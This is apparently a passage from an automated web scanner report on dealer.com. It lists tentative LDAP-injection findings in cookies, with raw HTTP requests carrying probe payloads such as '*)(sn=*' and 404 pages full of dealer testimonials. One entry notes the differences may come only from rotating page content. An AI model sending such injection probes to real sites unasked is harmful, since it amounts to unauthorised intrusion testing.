Date: Sun, 17 Apr 2011 01:28:00 GMT
Connection: close
Set-Cookie: exp_last_visit=b330b37b000bf702%29%21%28sn%3D%2A; expires=Mon, 16-Apr-2012 01:27:59 GMT; path=/
Set-Cookie: exp_last_activity=1303003679; expires=Mon, 16-Apr-2012 01:27:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>What I like best about SocialRelationship Manager&#8482; is it enables me as a dealer to both listen and to speak to my audience and customers on a platform that is so simple to use.</p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
...[SNIP]...

1.3. http://www.dealer.com/products/inventory-marketing/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/lead-management/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/inventory-marketing/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/lead-management/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/lead-management/ cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/inventory-marketing/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/inventory-marketing/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=*)(sn=*; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002863; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.46.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20215
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:26:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003618; expires=Mon, 16-Apr-2012 01:26:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Dealer.com's backend tool is definitely the best in the industry. I like the simplicity of one login, and how all the webstats are one click away.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We've incorporated more of Dealer.com's products because everything we put in place has worked. I really feel like we've got a partner in Dealer.com. </p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p> If I were to suggest any web provider in the world, I would suggest Dealer.com. Sign up today!</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Everyday we are told about how great our site is and how easy it is to get information from. We recently started a billboard campaign called "Shop in Your Underwear at Stevebaldo.com" to capture the majority of customers already online doing &#8230;</p>
   <cite>Sheila K. Snyder, Steve Baldo Dealerships</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/produc
...[SNIP]...

Request 2

GET /products/inventory-marketing/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/inventory-marketing/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=*)!(sn=*; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002863; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.46.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20189
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:27:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003619; expires=Mon, 16-Apr-2012 01:26:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Throughout my first few years here, researching and developing both a website and the Internet Sales Department for this dealership, I have used several nationally known Internet Service Providers (ISP). Dealer.com ended up the clear winner for more reasons than I &#8230;</p>
   <cite>Mike Poulin, Shearer Pontiac Cadillac Hummer</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com is always looking for ways to improve, so they're intense in that. They're never standing still and their service is impeccable.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spo
...[SNIP]...

1.4. http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif [exp_last_visit cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/call-tracking/media/uploads/page/loading.gif

Issue detail

The exp_last_visit cookie appears to be vulnerable to LDAP injection attacks.

The payloads 714ccbf8941beef9)(sn=* and 714ccbf8941beef9)!(sn=* were each submitted in the exp_last_visit cookie. The two requests produced different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Note that in each request pair recorded in this report both responses are the site's 404 page, and the captured bodies differ in the rotating testimonial and advert blocks, which by itself accounts for the differing Content-Length values; the Tentative confidence reflects that a response-difference heuristic alone does not establish an LDAP query behind the cookie.

Request 1

GET /products/lead-management/call-tracking/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=714ccbf8941beef9)(sn=*; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002857; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Flvlc%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.42.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19951
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:15:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002958; expires=Mon, 16-Apr-2012 01:15:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com has lived up to every one of their promises.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p> If I were to suggest any web provider in the world, I would suggest Dealer.com. Sign up today!</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight
...[SNIP]...

Request 2

GET /products/lead-management/call-tracking/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=714ccbf8941beef9)!(sn=*; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002857; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Flvlc%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.42.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20054
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:15:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002959; expires=Mon, 16-Apr-2012 01:15:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversio
...[SNIP]...

1.5. http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/ cookie. The two requests produced different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=*)(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002983; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.47.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20312
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003738; expires=Mon, 16-Apr-2012 01:28:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>I don't care who your website provider is, if it's not Dealer.com you need to at least take a look at them. I give them my absolute whole-hearted endorsement. I put my name on it. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com for over a year now and the entire experience has been positive.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>This is an awesome company which just happens to have their headquarters located about 5 minutes away from our dealership. I know their employees personally, I have been inside their building, and I have seen the explosive growth they have achieved. &#8230;</p>
   <cite>John Kimel, Lewis Autos</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>In the 2 years that we have been with Dealer.com, our rankings have drastically improved, and our lead volume has gone up at least 40%.</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Mark
...[SNIP]...

Request 2

GET /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
